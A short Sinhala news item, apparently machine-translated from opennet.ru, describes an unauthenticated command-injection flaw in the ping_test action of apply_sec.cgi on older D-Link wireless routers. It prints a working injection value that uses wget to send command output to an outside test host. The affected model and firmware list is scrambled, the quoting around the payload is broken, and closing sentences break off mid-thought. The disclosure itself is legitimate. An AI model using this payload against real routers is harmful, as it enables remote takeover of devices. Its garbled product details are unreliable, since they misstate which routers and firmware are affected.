D-Link රැහැන් රහිත රවුටර වල
සිත්ගන්නා කරුණ නම්, ස්ථිරාංග සංවර්ධකයින්ට අනුව, “ping_test” ඇමතුම ක්රියාත්මක කළ යුත්තේ සත්යාපනය කිරීමෙන් පසුව පමණි, නමුත් යථාර්ථයේ දී එය වෙබ් අතුරු මුහුණතට ලොග් වීම නොසලකා ඕනෑම අවස්ථාවක හැඳින්වේ. විශේෂයෙන්ම, apply_sec.cgi ස්ක්රිප්ට් වෙත ප්රවේශ වන විට සහ “action=ping_test” පරාමිතිය පසු කරන විට, ස්ක්රිප්ට් සත්යාපන පිටුවට හරවා යවයි, නමුත් ඒ සමඟම ping_test හා සම්බන්ධ ක්රියාව සිදු කරයි. කේතය ක්රියාත්මක කිරීම සඳහා, ping_test තුළම වෙනත් අවදානමක් භාවිතා කරන ලදී, එය පරීක්ෂණය සඳහා යවන ලද IP ලිපිනයේ නිවැරදි භාවය නිසි ලෙස පරීක්ෂා නොකර ping උපයෝගීතාව අමතයි. උදාහරණයක් ලෙස, wget උපයෝගීතාව ඇමතීමට සහ "echo 1234" විධානයේ ප්රතිඵල බාහිර ධාරකයකට මාරු කිරීමට, "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" පරාමිතිය සඳහන් කරන්න. test.test/?$( echo 1234)".
අනාරක්ෂිත බව පහත දැක්වෙන ආකෘතිවල නිල වශයෙන් තහවුරු කර ඇත:
- ස්ථිරාංග 655b3.02 හෝ ඊට වැඩි DIR-05;
- ස්ථිරාංග 866b1.03 හෝ ඊට වැඩි DIR-04L;
- ස්ථිරාංග 1565 හෝ ඊට වැඩි DIR-1.01;
- DIR-652 (ගැටළු සහිත ස්ථිරාංග අනුවාද පිළිබඳ තොරතුරු සපයා නැත)
මෙම ආකෘති සඳහා ආධාරක කාලය දැනටමත් කල් ඉකුත් වී ඇත, එබැවින් D-Link
පසුව අනාවරණය වූයේ එම අවදානමද ඇති බවයි
මූලාශ්රය: opennet.ru